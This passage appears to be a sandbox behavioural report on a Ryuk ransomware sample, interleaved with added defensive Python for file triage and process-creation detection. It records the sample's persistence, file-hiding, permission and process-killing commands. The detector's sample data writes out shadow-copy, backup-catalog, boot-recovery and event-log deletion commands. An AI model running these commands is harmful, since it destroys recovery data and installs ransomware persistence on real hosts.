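    r"C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl",
    r"C:\data\report.docx.RYK",  # constructed: bare-suffix variant
]

if __name__ == "__main__":
    s = triage(SAMPLE_PATHS)
    print("encrypted by extension:", dict(s["encrypted_by_ext"]))
    print("remove:", s["artifacts"] + s["startup"])
    for enc, orig in s["restore_map"].items():
        print("restore", orig, "<-", enc)
```

The restore map is the useful output during recovery: it tells you which original file each `.RYK` corresponds to without trusting anything inside the encrypted file itself. Files with no extension (the Java `zi` timezone data above) land in the `(none)` bucket rather than being mis-parsed.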

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A (4 separate launches)

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A (5 separate launches)

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A (5 separate launches)

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe
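Every signature from "Clears Windows event logs" down to "Runs net.exe" is the sample driving a built-in Windows binary (wevtutil, vssadmin, bcdedit, wbadmin, schtasks, taskkill, sc, icacls, net) rather than doing the work itself, which is why these detonations are detectable from process-creation telemetry (Sysmon Event ID 1 or Security 4688) long before any file is encrypted. The following is an added example (not sandbox output and not the sample's code) that scores per-host process-creation records against those signatures and raises a verdict once several recovery mechanisms have been destroyed on one host. The report records only image paths (its Description and Indicator columns read N/A), so the command-line patterns below are this example's assumptions about typical ransomware usage of each tool; the `time|host|parent|image|cmdline` record format and all sample records are constructed.

```python
import re
from collections import Counter, defaultdict

# One rule per report signature: (signature, image basename, command-line regex).
# The regexes describe typical ransomware usage of each tool and are an
# assumption of this example; the report above records only the image paths.
RULES = [
    ("Clears Windows event logs", "wevtutil.exe",
     re.compile(r"\b(cl|clear-log)\s+\S+", re.I)),
    ("Deletes shadow copies", "vssadmin.exe",
     re.compile(r"\bdelete\s+shadows\b|\bresize\s+shadowstorage\b", re.I)),
    ("Modifies boot configuration data using bcdedit", "bcdedit.exe",
     re.compile(r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures", re.I)),
    ("Deletes backup catalog", "wbadmin.exe",
     re.compile(r"\bdelete\s+(catalog|systemstatebackup)\b", re.I)),
    ("Creates scheduled task(s)", "schtasks.exe", re.compile(r"/create\b", re.I)),
    ("Kills process with taskkill", "taskkill.exe", re.compile(r"/(im|pid)\s+\S+", re.I)),
    ("Launches sc.exe", "sc.exe", re.compile(r"\b(stop|config|delete)\s+\S+", re.I)),
    ("Modifies file permissions", "icacls.exe", re.compile(r"/grant\s+\S*everyone", re.I)),
    ("Runs net.exe", "net.exe", re.compile(r"\bstop\s+\S+", re.I)),
]

# Signatures that together mean recovery is being destroyed ahead of encryption.
RECOVERY_INHIBITION = {
    "Clears Windows event logs",
    "Deletes shadow copies",
    "Modifies boot configuration data using bcdedit",
    "Deletes backup catalog",
}


def parse_event(line):
    """Parse one constructed 'time|host|parent_image|image|command_line' record."""
    time, host, parent, image, cmdline = line.split("|", 4)
    return {"time": time, "host": host, "parent": parent,
            "image": image, "cmdline": cmdline}


def match_rules(event):
    """Return the report signatures a single process-creation event satisfies."""
    base = event["image"].rsplit("\\", 1)[-1].lower()
    return [sig for sig, img, rx in RULES
            if img == base and rx.search(event["cmdline"])]


def score_host(events):
    """Aggregate signature hits for one host and assign a verdict."""
    hits = Counter()
    for ev in events:
        for sig in match_rules(ev):
            hits[sig] += 1
    inhibited = RECOVERY_INHIBITION & set(hits)
    if len(inhibited) >= 3:
        verdict = "ransomware-precursor"   # several recovery paths destroyed
    elif inhibited:
        verdict = "suspicious"             # one tool abused; may be admin activity
    else:
        verdict = "benign"
    return {"verdict": verdict, "hits": dict(hits),
            "recovery_inhibition": sorted(inhibited)}


def score_by_host(lines):
    """Group raw records by host and score each host independently."""
    per_host = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        per_host[ev["host"]].append(ev)
    return {host: score_host(evs) for host, evs in per_host.items()}


# Constructed records, not sandbox output. WS01 mimics the chain in this
# report, WS02 is benign administrative use of the same binaries, and WS03
# shows a single shadow-copy deletion on its own.
SAMPLE_EVENTS = [
    r"2023-03-09T18:22:41|WS01|C:\Windows\system32\cmd.exe|C:\Windows\system32\wevtutil.exe|wevtutil.exe cl System",
    r"2023-03-09T18:22:41|WS01|C:\Windows\system32\cmd.exe|C:\Windows\system32\wevtutil.exe|wevtutil.exe cl Security",
    r"2023-03-09T18:22:42|WS01|C:\Windows\system32\cmd.exe|C:\Windows\system32\vssadmin.exe|vssadmin.exe Delete Shadows /all /quiet",
    r"2023-03-09T18:22:42|WS01|C:\Windows\system32\cmd.exe|C:\Windows\system32\bcdedit.exe|bcdedit /set {default} recoveryenabled No",
    r"2023-03-09T18:22:43|WS01|C:\Windows\system32\cmd.exe|C:\Windows\system32\wbadmin.exe|wbadmin delete catalog -quiet",
    r"2023-03-09T18:22:44|WS01|C:\Windows\system32\cmd.exe|C:\Windows\system32\schtasks.exe|schtasks /Create /SC ONSTART /TN upd /TR C:\Users\Admin\upd.exe",
    r"2023-03-09T18:30:00|WS02|C:\Windows\explorer.exe|C:\Windows\system32\vssadmin.exe|vssadmin list shadows",
    r"2023-03-09T18:30:05|WS02|C:\Windows\explorer.exe|C:\Windows\system32\schtasks.exe|schtasks /Query /TN Backup",
    r"2023-03-09T18:40:00|WS03|C:\Windows\system32\cmd.exe|C:\Windows\system32\vssadmin.exe|vssadmin Delete Shadows /all /quiet",
]

if __name__ == "__main__":
    for host, result in score_by_host(SAMPLE_EVENTS).items():
        print(host, result["verdict"], result["hits"])
```

Matching on the image basename plus a verb-level pattern is what keeps the benign host quiet: `vssadmin list shadows` and `schtasks /Query` use the same binaries the sample abused but never match. The verdict threshold is deliberately on distinct recovery-inhibition signatures rather than raw hit counts, so the 64 `wevtutil` launches in the table above count once, while a lone `vssadmin Delete Shadows` is only flagged as suspicious and left for an analyst to confirm.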

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A (42 separate events)
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 928 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 868 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 868 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 868 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 928 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 460 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 460 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 460 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 516 wrote to memory of 652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 516 wrote to memory of 652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 516 wrote to memory of 652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 928 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 568 wrote to memory of 1452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 568 wrote to memory of 1452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 568 wrote to memory of 1452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 928 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1188 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1188 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1188 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 928 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1964 wrote to memory of 1876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1964 wrote to memory of 1876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1964 wrote to memory of 1876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 928 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1768 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1768 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1768 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 928 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1544 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1544 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 928 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1604 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1604 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1604 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1604 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1604 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1604 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1100 wrote to memory of 1480 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

